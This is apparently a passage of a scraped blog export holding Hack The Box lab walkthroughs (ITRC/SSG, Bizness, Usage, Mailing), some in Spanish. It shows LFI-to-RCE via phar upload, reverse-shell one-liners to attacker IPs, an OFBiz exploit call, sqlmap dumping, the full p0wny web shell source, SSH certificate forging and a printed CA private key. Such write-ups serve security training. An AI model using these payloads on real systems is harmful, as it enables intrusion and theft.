e1:1a:b5:0e:87:a4:a1:81:69:94:9d:d4:d4:a3:8a:f9 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://itrc.ssg.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) 2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA) |_ 256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` **Host file:** ```bash ❯ echo \"10.10.11.27 itrc.ssh.htb\" | sudo tee /etc/hosts 10.10.11.27 itrc.ssh.htb ``` # Enumeration Of Web Services **Whatweb:** ![Image](image-1.png) **php 8.1.29 version** **Web:** ![Image](image-2.png) **Register and login** ![Image](image-3.png) When i create a empty file with extension zip and upload, display a error. ![Image](image-4.png) ## Parameter Enumerartion ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://itrc.ssg.htb/index.php?page=FUZZ' -fs 3120 ``` ![Image](image-5.png) ![Image](image-6.png) Possible user? `zzinter` ![Image](image-7.png) ## LFI - Local File Inclusion Back to the error that we got upload empty file. ```bash **Deprecated**: ZipArchive::open(): Using empty file as ZipArchive is deprecated in **/var/www/itrc/savefile.inc.php** on line **38** **Warning**: hash_file(/tmp/phpXqBGtj): Failed to open stream: No such file or directory in **/var/www/itrc/savefile.inc.php** on line **48** **Warning**: Cannot modify header information - headers already sent by (output started at /var/www/itrc/savefile.inc.php:38) in **/var/www/itrc/api/create_ticket.php** on line **31** ``` - ZipArchive::open() - hash_file # Identification and exploitation of vulnerabilities `/var/www/itrc/api/create_ticket.php` ```bash http://itrc.ssg.htb/?page=/var/www/itrc/api/create_ticket ``` [wrappers](https://www.php.net/manual/en/wrappers.phar.php) [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#phar-archive-structure) https://www.php.net/manual/en/context.phar.php ```php ``` zip the file.php and upload ```bash http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell ``` ![Image](image-8.png) ```bash http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell&cmd=whoami ``` ![Image](image-9.png) ## RCE | Remote Code Execution Now we can execute remote code for get a reverse shell. **Encode to url with burpsuite** `bash -c 'bash -i >& /dev/tcp/10.10.16.50/9090 0>&1'` ```bash http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell&cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.16.50/9090+0%3E%261%27 ``` ```bash rlwrap nc -nlvp 9090 ``` ![Image](image-10.png) We have a 2 users: ``` msainristil:x:1000:1000::/home/msainristil:/bin/bash zzinter:x:1001:1001::/home/zzinter:/bin/bash ``` ``` $dsn = \"mysql:host=db;dbname=resourcecenter;\"; $dbusername = \"jj\"; $dbpassword = \"ugEG5rR5SG8uPd\"; $pdo = new PDO($dsn, $dbusername, $dbpassword); ``` `cat itrc.ssg.htb.har | grep msainristil` ![Image](image-11.png) ```bash text\": \"user=msainristil&pass=82yards2closeit\", \"value\": \"msainristil\" ``` ```bash ssh msainristil@itrc.ssg.htb ``` ![Image](image-12.png) We found a 2 files in decomission_old_ca ## Lateral Movement | Zzinter itrc The main purpose of ca-itrc and ca-itrc.pub is to sign public keys of other users, thereby generating certificates that validate the identity of users. This allows for secure authentication in systems that trust the certificate authority (CA). ![Image](image-13.png) 1. Create a new key ```ssh ssh-keygen -t rsa -b 2048 -f racc0x ``` 2. Sign the public key with the CA's private key ```ssh ssh-keygen -s ca-itrc -I ca-itrc.pub -n zzinter racc0x.pub ``` 3. Verify the certificate ```ssh ssh-keygen -Lf racc0x-cert.pub ``` 4. Login in the host as zzinter ```ssh ssh -o CertificateFile=racc0x-cert.pub -i racc0x zzinter@localhost ``` ![Image](image-14.png) ## Lateral Movement | Root itrc We can do the same procces for root ```bash ssh-keygen -t rsa -b 2048 -f root ssh-keygen -s ca-itrc -I ca-itrc.pub -n root root.pub ssh -o CertificateFile=root-cert.pub -i root root@localhost ``` ![Image](image-15.png) We found as zzinter a code `sign_key_api.sh` ```bash #!/bin/bash usage () { echo \"Usage: $0 \" exit 1 } if [ \"$#\" -ne 3 ]; then usage fi public_key_file=\"$1\" username=\"$2\" principal_str=\"$3\" supported_principals=\"webserver,analytics,support,security\" IFS=',' read -ra principal racc0x ``` ```bash ssh -i support -p 2222 -o CertificateFile=racc0x support@172.223.0.1 ``` ![Image](image-16.png) ![Image](image-17.png) ## Lateral Movement | Zzinter ssg We go to do the same proccess `ssh-keygen -t rsa -b 2048 -f zzinter` ```bash echo \"ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAgff6r7XjpBfVUeEjR8/R2MMMlznI8UndoAxoNgKwuIAQAAAADAQABAAABAQDHnZIE137c9lDZzVmrru1JuzIenLN9ImpXMpza8+Ny2P9t0rDjTCuZsXtPa7X60gFxJUzjylRbXEvvb3csDT+qgjwGkAG0AcmBF7RTGiKddcE0eon3WvU+3xs4ffiZm1vOZ6YzSyiKWAzz+xD4Q3S2zRQwoX1Q+E7/QtVibkVhO5rO3j5NpXLRocXi4aNzjKk6S7POF7UH/XNjzb/iVqiY+XiuHwQDFilydiZkWAEJxnRWLZk+Noict1OJsEEBeff7ki/pvK6pvYepL3NyYaB7xOp+IR02m+RjUf0VVNsA2zFiy1XgEydhHEkLyJz667CnqQQxRxPPyrkeiL6lk/TxAAAAAAAAACoAAAABAAAAB3p6aW50ZXIAAAAQAAAADHp6aW50ZXJfdGVtcAAAAABm4UHK//////////8AAAAAAAAAggAAABVwZXJtaXQtWDExLWZvcndhcmRpbmcAAAAAAAAAF3Blcm1pdC1hZ2VudC1mb3J3YXJkaW5nAAAAAAAAABZwZXJtaXQtcG9ydC1mb3J3YXJkaW5nAAAAAAAAAApwZXJtaXQtcHR5AAAAAAAAAA5wZXJtaXQtdXNlci1yYwAAAAAAAAAAAAAAMwAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAFMAAAALc3NoLWVkMjU1MTkAAABAluOC7mW2itTs0+Zz+GRpC5MLqHxahXMfDH8fWb2rRTlvYoGHO23i+zMywGiUWLLpXEL3Se1ZoN5Bihh583vXBw== zzinter@itrc\" > raccox ``` `chmod 600 raccox` `chmod 600 zzinter` ```bash ssh -p 2222 -i zzinter -o CertificateFile=raccox zzinter@172.223.0.1 ``` ![Image](image-18.png) ![Image](image-19.png) `Sudo -l` ![Image](image-20.png) This is the same process as with `sign_key_api.sh`. - sign_key.sh ```python #!/bin/bash usage () { echo \"Usage: $0 \" exit 1 } if [ \"$#\" -ne 5 ]; then usage fi ca_file=\"$1\" public_key_file=\"$2\" username=\"$3\" principal_str=\"$4\" serial=\"$5\" if [ ! -f \"$ca_file\" ]; then echo \"Error: CA file '$ca_file' not found.\" usage fi itca=$(cat /etc/ssh/ca-it) ca=$(cat \"$ca_file\") if [[ $itca == $ca ]]; then echo \"Error: Use API for signing with this CA.\" usage fi if [ ! -f \"$public_key_file\" ]; then echo \"Error: Public key file '$public_key_file' not found.\" usage fi supported_principals=\"webserver,analytics,support,security\" IFS=',' read -ra principal <<< \"$principal_str\" for word in \"${principal[@]}\"; do if ! echo \"$supported_principals\" | grep -qw \"$word\"; then echo \"Error: '$word' is not a supported principal.\" echo \"Choose from:\" echo \" webserver - external web servers - webadmin user\" echo \" analytics - analytics team databases - analytics user\" echo \" support - IT support server - support user\" echo \" security - SOC servers - support user\" echo usage fi done if ! [[ $serial =~ ^[0-9]+$ ]]; then echo \"Error: '$serial' is not a number.\" usage fi ssh-keygen -s \"$ca_file\" -z \"$serial\" -I \"$username\" -V -1w:forever -n \"$principal\" \"$public_key_file\" ``` ## Lateral Movement | Root ssg ```python import string import subprocess s = string.ascii_letters+'+'+ '-' + '\\n' + ' '+ '/' + '=' + string.digits strlist = '-' while True: for i in s: listres = i + strlist listtemp = '*' + listres with open('testca', 'w') as f: f.write(listtemp) a=subprocess.run(f'sudo /opt/sign_key.sh ./testca test.pub root root_user 1', shell=True, stdout=subprocess.PIPE, text=True) if 'Use API for signing with this CA' in a.stdout: strlist = listres print(strlist) break ``` `ca.key` ``` -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW QyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAKg7BlysOwZc rAAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQ AAAEBexnpzDJyYdz+91UG3dVfjT/scyWdzgaXlgx75RjYOo4Hg8Cudy1ShyYfqzC3ANlgA cW7Q4MoZuezAE8mNFSmxAAAAIkdsb2JhbCBTU0cgU1NIIENlcnRmaWNpYXRlIGZyb20gSV QBAgM= -----END OPENSSH PRIVATE KEY----- ``` `chmod 600 ca.key` ```bash ssh-keygen -s ca.key -z 200 -I root -V -10w:forever -n root_user root.pub ``` The output is give us a root-cert.pub ```bash ssh root@itrc.ssg.htb -p2222 -i root -i root-cert.pub ``` ![Image](image-21.png)"},{"id":"bizness","title":"HTB - Bizness","description":"HTB - Bizness","date":"2024-08-13T00:00:00.000Z","tags":["hackthebox","Apache","OFBiz","dirsearch","nmap","cracking","enumeration","hashcat","htb-bizness","ctf","CVE-2023-49070","linux"],"authors":["r4cc0x"],"url":"/blog/bizness","content":"## Box Info | Name | Bizness | | :-------------------- | ---------------: | | Release Date | 06 Jan, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## Enumeration ```bash nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.252 -oG allports nmap -sCV -p 22,80,443,40117 10.10.11.252 -oN targeted ``` ![Image](bizness1.png) ## Add the domain to /etc/hosts ```bash echo \"10.10.11.252 bizness.htb | sudo tee -a /etc/hosts/ ``` ![Image](bizness2.png) ## Brute Force Directory ```bash dirsearch -u http://bizness.htb/ ``` ![Image](bizness3.png) ## OFBiz The website is using a technology called `OFBiz` with version `18.12`, the current version is out date. ![Image](bizness4.png) ## Apache OFBiz 18.12 CVE-2023-49070 ![Image](Bizness5.png) [***Apache-OFBiz-Authentication-Bypass***](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass) We used the exploit to authenticate ourselves. ```bash python3 exploit.py --url https://bizness.htb:443 --cmd 'nc -e /bin/bash 10.10.14.16 7777' ``` ```bash nc -lvnp 7777 ``` ![Image](bizness6.png) ## Enumeration linux Before launching this search, I found a location where the OFBiz folder was located and performed searches that contain admin. I searched recursively using grep, using options like -Rail, and to specify the word I used -e. ```shell grep -Rail -e 'admin$' /top/ofbiz/runtime/data/derby/ofbiz/seg0 ``` ![Image](bizness7.png) We came across a lot of data, so we have to go through each one by one. We find a user and the hash ![Image](bizness8.png) ## Cracking Hash We will use the Go hash matcher script to crack the password. [**Go-Hash-Matcher**](https://github.com/IamLucif3r/Go-Hash-Matcher?source=post_page-----68713a41f98b--------------------------------) ![Image](bizness9.png) Once we have the password, we log in at the `root` ![Image](bizness10.png)"},{"id":"usage","title":"HTB - Usage","description":"HTB - Usage","date":"2024-06-05T00:00:00.000Z","tags":["HackTheBox","Easy","AD","nxc","DACL","Kerberos","DPAPI","bloodhound","john"],"authors":[],"url":"/blog/usage","content":"## Box Info | Name | Usage | | :-------------------- | ---------------: | | Release Date | 13 Apr, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## Recon ```zsh # Nmap 7.94SVN scan initiated Sun Jun 2 20:56:08 2024 as: nmap -sCV -p 22,80 -oN targete │ d 10.10.11.18 2 │ Nmap scan report for 10.10.11.18 3 │ Host is up (0.084s latency). 4 │ 5 │ PORT STATE SERVICE VERSION 6 │ 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) 7 │ | ssh-hostkey: 8 │ | 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA) 9 │ |_ 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519) 10 │ 80/tcp open http nginx 1.18.0 (Ubuntu) 11 │ |_http-server-header: nginx/1.18.0 (Ubuntu) 12 │ |_http-title: Did not follow redirect to 13 │ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 14 │ 15 │ Service detection performed. Please report any incorrect results at │ it/ . 16 │ # Nmap done at Sun Jun 2 20:56:18 2024 -- 1 IP address (1 host up) scanned in 10.52 seco │ nds ``` ```zsh wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,404,403,302,301 -H \"Host: FUZZ.usage.htb\" -u [ ]( ) -t 100 ``` ![](Untitled.png) Intente buscar alguna vulnerabilidad para laravel pero no encontre nada asi que intente con algun XSS y tampoco obtuve nada asi que intente por SQLInjection ![Image](Untitled1.png) SQLInjection: ‘ ORDER BY 8;— - ‘ ORDER BY 9;— - ![Image](Untitled2.png) ![Image](Untitled3.png) copy and paste to > request.txt for sqlmap option ```zsh sqlmap -r request.txt --level 5 --risk 3 -p email --threads 10 --dbs --batch ``` ![Image](Untitled4.png) ![Image](Untitled5.png) ![Image](Untitled6.png) ![Image](Untitled7.png) ![Image](Untitled8.png) ```zsh sqlmap -r request.txt --level 5 --risk 3 -p email --batch -D usage_blog -T admin_users -C username,password --dump --threads 10 ``` ![Image](Untitled9.png) ```zsh +----------+--------------------------------------------------------------+ | username | password | +----------+--------------------------------------------------------------+ | admin | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | +----------+--------------------------------------------------------------+ ``` ```zsh echo \"$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2\" > hash.txt ``` ![Image](Untitled10.png) ```zsh john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt password.txt ``` ![Image](Untitled11.png) Usamos las credenciales para logearnos ![Image](Untitled12.png) Encontre esta vulnerabilidad para laravel encore ![Image](Untitled13.png) Coincide porque tenemos un apartado para subir un archivo imagen ![Image](Untitled14.png) ```bash 'p0wny', 'hostname' => 'shell', ); function expandPath($path) { if (preg_match(\"#^(~[a-zA-Z0-9_.-]*)(/.*)?$#\", $path, $match)) { exec(\"echo $match[1]\", $stdout); return $stdout[0] . $match[2]; } return $path; } function allFunctionExist($list = array()) { foreach ($list as $entry) { if (!function_exists($entry)) { return false; } } return true; } function executeCommand($cmd) { $output = ''; if (function_exists('exec')) { exec($cmd, $output); $output = implode(\"\\\\n\", $output); } else if (function_exists('shell_exec')) { $output = shell_exec($cmd); } else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) { ob_start(); system($cmd); $output = ob_get_contents(); ob_end_clean(); } else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) { ob_start(); passthru($cmd); $output = ob_get_contents(); ob_end_clean(); } else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) { $handle = popen($cmd, 'r'); while (!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); } else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) { $handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes); $output = stream_get_contents($pipes[1]); proc_close($handle); } return $output; } function isRunningWindows() { return stripos(PHP_OS, \"WIN\") === 0; } function featureShell($cmd, $cwd) { $stdout = \"\"; if (preg_match(\"/^\\\\s*cd\\\\s*(2>&1)?$/\", $cmd)) { chdir(expandPath(\"~\")); } elseif (preg_match(\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\", $cmd)) { chdir($cwd); preg_match(\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\", $cmd, $match); chdir(expandPath($match[1])); } elseif (preg_match(\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\", $cmd)) { chdir($cwd); preg_match(\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\", $cmd, $match); return featureDownload($match[1]); } else { chdir($cwd); $stdout = executeCommand($cmd); } return array( \"stdout\" => base64_encode($stdout), \"cwd\" => base64_encode(getcwd()) ); } function featurePwd() { return array(\"cwd\" => base64_encode(getcwd())); } function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == 'cmd') { $cmd = \"compgen -c $fileName\"; } else { $cmd = \"compgen -f $fileName\"; } $cmd = \"/bin/bash -c \\\\\"$cmd\\\\\"\"; $files = explode(\"\\\\n\", shell_exec($cmd)); foreach ($files as &$filename) { $filename = base64_encode($filename); } return array( 'files' => $files, ); } function featureDownload($filePath) { $file = @file_get_contents($filePath); if ($file === FALSE) { return array( 'stdout' => base64_encode('File not found / no read permission.'), 'cwd' => base64_encode(getcwd()) ); } else { return array( 'name' => base64_encode(basename($filePath)), 'file' => base64_encode($file) ); } } function featureUpload($path, $file, $cwd) { chdir($cwd); $f = @fopen($path, 'wb'); if ($f === FALSE) { return array( 'stdout' => base64_encode('Invalid path / no write permission.'), 'cwd' => base64_encode(getcwd()) ); } else { fwrite($f, base64_decode($file)); fclose($f); return array( 'stdout' => base64_encode('Done.'), 'cwd' => base64_encode(getcwd()) ); } } function initShellConfig() { global $SHELL_CONFIG; if (isRunningWindows()) { $username = getenv('USERNAME'); if ($username !== false) { $SHELL_CONFIG['username'] = $username; } } else { $pwuid = posix_getpwuid(posix_geteuid()); if ($pwuid !== false) { $SHELL_CONFIG['username'] = $pwuid['name']; } } $hostname = gethostname(); if ($hostname !== false) { $SHELL_CONFIG['hostname'] = $hostname; } } if (isset($_GET[\"feature\"])) { $response = NULL; switch ($_GET[\"feature\"]) { case \"shell\": $cmd = $_POST['cmd']; if (!preg_match('/2>/', $cmd)) { $cmd .= ' 2>&1'; } $response = featureShell($cmd, $_POST[\"cwd\"]); break; case \"pwd\": $response = featurePwd(); break; case \"hint\": $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']); break; case 'upload': $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']); } header(\"Content-Type: application/json\"); echo json_encode($response); die(); } else { initShellConfig(); } ?> p0wny@shell:~# html, body { margin: 0; padding: 0; background: #333; color: #eee; font-family: monospace; width: 100vw; height: 100vh; overflow: hidden; } *::-webkit-scrollbar-track { border-radius: 8px; background-color: #353535; } *::-webkit-scrollbar { width: 8px; height: 8px; } *::-webkit-scrollbar-thumb { border-radius: 8px; -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3); background-color: #bcbcbc; } #shell { background: #222; box-shadow: 0 0 5px rgba(0, 0, 0, .3); font-size: 10pt; display: flex; flex-direction: column; align-items: stretch; max-width: calc(100vw - 2 * var(--shell-margin)); max-height: calc(100vh - 2 * var(--shell-margin)); resize: both; overflow: hidden; width: 100%; height: 100%; margin: var(--shell-margin) auto; } #shell-content { overflow: auto; padding: 5px; white-space: pre-wrap; flex-grow: 1; } #shell-logo { font-weight: bold; color: #FF4180; text-align: center; } :root { --shell-margin: 25px; } @media (min-width: 1200px) { :root { --shell-margin: 50px !important; } } @media (max-width: 991px), (max-height: 600px) { #shell-logo { font-size: 6px; margin: -25px 0; } :root { --shell-margin: 0 !important; } #shell { resize: none; } } @media (max-width: 767px) { #shell-input { flex-direction: column; } } @media (max-width: 320px) { #shell-logo { font-size: 5px; } } .shell-prompt { font-weight: bold; color: #75DF0B; } .shell-prompt > span { color: #1BC9E7; } #shell-input { display: flex; box-shadow: 0 -1px 0 rgba(0, 0, 0, .3); border-top: rgba(255, 255, 255, .05) solid 1px; padding: 10px 0; } #shell-input > label { flex-grow: 0; display: block; padding: 0 5px; height: 30px; line-height: 30px; } #shell-input #shell-cmd { height: 30px; line-height: 30px; border: none; background: transparent; color: #eee; font-family: monospace; font-size: 10pt; width: 100%; align-self: center; box-sizing: border-box; } #shell-input div { flex-grow: 1; align-items: stretch; } #shell-input input { outline: none; } var SHELL_CONFIG = ; var CWD = null; var commandHistory = []; var historyPosition = 0; var eShellCmdInput = null; var eShellContent = null; function _insertCommand(command) { eShellContent.innerHTML += \"\\\\n\\\\n\"; eShellContent.innerHTML += ' ' + genPrompt(CWD) + ' '; eShellContent.innerHTML += escapeHtml(command); eShellContent.innerHTML += \"\\\\n\"; eShellContent.scrollTop = eShellContent.scrollHeight; } function _insertStdout(stdout) { eShellContent.innerHTML += escapeHtml(stdout); eShellContent.scrollTop = eShellContent.scrollHeight; } function _defer(callback) { setTimeout(callback, 0); } function featureShell(command) { _insertCommand(command); if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) { featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]); } else if (/^\\\\s*clear\\\\s*$/.test(command)) { // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer eShellContent.innerHTML = ''; } else { makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) { if (response.hasOwnProperty('file')) { featureDownload(atob(response.name), response.file) } else { _insertStdout(atob(response.stdout)); updateCwd(atob(response.cwd)); } }); } } function featureHint() { if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete function _requestCallback(data) { if (data.files.length 3) { var splittedCwd = cwd.split(\"/\"); shortCwd = \"…/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1]; } return SHELL_CONFIG[\"username\"] + \"@\" + SHELL_CONFIG[\"hostname\"] + \": \" + shortCwd + \" #\"; } function updateCwd(cwd) { if (cwd) { CWD = cwd; _updatePrompt(); return; } makeRequest(\"?feature=pwd\", {}, function(response) { CWD = atob(response.cwd); _updatePrompt(); }); } function escapeHtml(string) { return string .replace(/&/g, \"&amp;\") .replace(/ /g, \"&gt;\"); } function _updatePrompt() { var eShellPrompt = document.getElementById(\"shell-prompt\"); eShellPrompt.innerHTML = genPrompt(CWD); } function _onShellCmdKeyDown(event) { switch (event.key) { case \"Enter\": featureShell(eShellCmdInput.value); insertToHistory(eShellCmdInput.value); eShellCmdInput.value = \"\"; break; case \"ArrowUp\": if (historyPosition > 0) { historyPosition--; eShellCmdInput.blur(); eShellCmdInput.value = commandHistory[historyPosition]; _defer(function() { eShellCmdInput.focus(); }); } break; case \"ArrowDown\": if (historyPosition >= commandHistory.length) { break; } historyPosition++; if (historyPosition === commandHistory.length) { eShellCmdInput.value = \"\"; } else { eShellCmdInput.blur(); eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; } break; case 'Tab': event.preventDefault(); featureHint(); break; } } function insertToHistory(cmd) { commandHistory.push(cmd); historyPosition = commandHistory.length; } function makeRequest(url, params, callback) { function getQueryString() { var a = []; for (var key in params) { if (params.hasOwnProperty(key)) { a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key])); } } return a.join(\"&\"); } var xhr = new XMLHttpRequest(); xhr.open(\"POST\", url, true); xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\"); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { try { var responseJson = JSON.parse(xhr.responseText); callback(responseJson); } catch (error) { alert(\"Error while parsing response: \" + error); } } }; xhr.send(getQueryString()); } document.onclick = function(event) { event = event || window.event; var selection = window.getSelection(); var target = event.target || event.srcElement; if (target.tagName === \"SELECT\") { return; } if (!selection.toString()) { eShellCmdInput.focus(); } }; window.onload = function() { eShellCmdInput = document.getElementById(\"shell-cmd\"); eShellContent = document.getElementById(\"shell-content\"); updateCwd(); eShellCmdInput.focus(); }; ___ ____ _ _ _ _ _ _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ | '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _| | |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _| | .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| |_| |___/ \\\\____/ ??? ``` [https://github.com/flozz/p0wny-shell](https://github.com/flozz/p0wny-shell) ![Image](Untitled15.png) ![Image](Untitled16.png) ```zsh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 7272 >/tmp/f ``` - `rm /tmp/f;`: Esto elimina cualquier archivo llamado \"f\" en el directorio `/tmp`. `rm` es el comando para eliminar archivos. - `mkfifo /tmp/f;`: Esto crea un \"named pipe\" (tubería con nombre) llamado \"f\" en el directorio `/tmp`. Un named pipe es un tipo de archivo especial que permite la comunicación entre procesos. - `cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 10032 >/tmp/f`: Este es el comando principal y se desglosa en varias partes: - `cat /tmp/f`: Lee el contenido de la tubería con nombre `/tmp/f`. - `|`: El símbolo de tubería (pipe) conecta la salida de un comando con la entrada de otro. - `/bin/sh -i`: Inicia un shell interactivo. `/bin/sh` es el intérprete de comandos (shell), y `i` indica que se inicie en modo interactivo. - `2>&1`: Redirige la salida de error estándar (stderr) al mismo lugar que la salida estándar (stdout). Esto significa que los errores también se enviarán a través de la tubería. - `|`: Otra tubería para conectar la salida del shell con el siguiente comando. - `nc 10.10.14.25 10032`: Ejecuta `nc` (netcat) para establecer una conexión de red con la dirección IP `10.10.14.25` en el puerto `10032`. Esto establecerá una conexión a una máquina remota en el puerto especificado. - `>/tmp/f`: Redirige la salida estándar (stdout) del comando `nc` de vuelta a la tubería con nombre `/tmp/f`. Esto cierra el ciclo, haciendo que cualquier salida generada en la máquina remota a través de la conexión `nc` se envíe de vuelta a la máquina original a través de la tubería con nombre. Obtendremos una shell inversa (reverse shell) ![Image](Untitled17.png) Descargamos el id_rsa para entrar por ssh chmod 400 id_rsa ```zsh ssh -i id_rsa dash@10.10.11.18 ``` ![Image](Untitled18.png) Una vez obtenido la consola interactiva con ssh podremos brincar a un nuevo usuario con mayor privilegios (xander) ![Image](Untitled19.png) > Monit es particularmente útil para monitorear procesos daemon, como aquellos iniciados al arrancar el sistema. Por ejemplo, sendmail, sshd, apache y mysql. ```zsh cat ~/.monitrc ``` ![Image](Untitled20.png) ```zsh ssh xander@10.10.11.18 ``` ```zsh password: 3nc0d3d_pa$$w0rd ``` ejecutamos \"id\" para enumerar ![Image](Untitled21.png) ```zsh sudo -l ``` ![Image](Untitled22.png) Revisamos esta herramienta que podemos ejecutar sin proporcionar contraseña de root ![Image](Untitled23.png) / usr/bin/7za: Es la ruta al comando 7za, que indica el comando a ejecutar. a: significa agregar archivos al archivo comprimido. /var/backups/project.zip: La ruta y nombre del archivo comprimido. El archivo Zip a crear se llama project.zip y está ubicado en el directorio /var/backups/. -tzip: Especifica el tipo de archivo comprimido en formato ZIP. -snl: Desactiva la compresión de enlaces simbólicos suaves. Esta opción le dice a 7za que no incluya enlaces simbólicos al comprimir, sino que comprima directamente los archivos destino de los enlaces simbólicos. -mmt: Usa multi-threading para operaciones de compresión para acelerar la compresión. -- *: Esta parte indica los parámetros del comando, -- indica que los parámetros siguientes son todos nombres de archivos, y * indica todos los archivos y carpetas en el directorio actual. ![Image](Untitled24.png) Principalmente observa -snl, que comprime directamente el archivo destino del enlace simbólico suave, lo que significa que podemos establecer una conexión suave a un directorio de altos privilegios y leer el contenido de los archivos del directorio de altos privilegios. ![Image](Untitled25.png)"},{"id":"mailing","title":"HTB - Mailing","description":"HTB - Mailing","date":"2024-02-02T16:17:34.000Z","tags":["HackTheBox","Impacket","wmiexec","NTLM","CVE-2024-21413","telnet","Evil-winrm","smb","more","nmap","hashcat","Dump-Sam-Hash"],"authors":["r4cc0x"],"url":"/blog/mailing","content":"## Box Info | Name | Mailing | | :-------------------- | ---------------: | | Release Date | 02 Mar, 2024 | | OS | Windows | | Rated Difficulty | Easy | ## **Enumeration** ```bash nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.14 -oG allPorts ``` ![Image](1.png) ![Image](2.png) ExtractPorts ```bash nmap -sCV -p 25,80,110,135,139,143,445,465,587,993,5040,5985,7680,47001... 10.10.11.14 -oN targeted ``` ![Image](3.png) ![Image](4.png) ![Image](5.png) #### **Adding Domain to Hosts File** ```bash echo \"10.10.11.14 mailing.htb\" | sudo tee -a /etc/hosts ``` ![Image](6.png) ![Image](7.png) ## **Information Gathering** Below the website you can download a pdf file. ![Image](8.png) the file download has this potential `LFI` ![Image](9.png) ### Directory Brute Forcing Dirsearch ![Image](10.png) Or with curl -I can give you something interesting `curl -I ![Image](11.png) ## **Exploitation** Our first foothold is the **LFI** found. We go to intercept the request and see what we can do. `/download.php?file=../../windows/system32/drivers/etc/hosts`{: filepath} ![Image](12.png) We will try to point to the hosts file to confirm if we are against an LFI. After exploring the folder structure of hMailServer and asking ChatGPT what should be inside, I found the `hMailServer.INI` file in the `bin` folder and `hmailserver_awstats.log` in the `logs` folder. [Structure folder from hMailServer](https://www.hmailserver.com/documentation/v4.4/?page=folderstructure) I accessed the logs to determine which emails I can access. ![Image](13.png) In the `hMailServer.INI` file, I found the 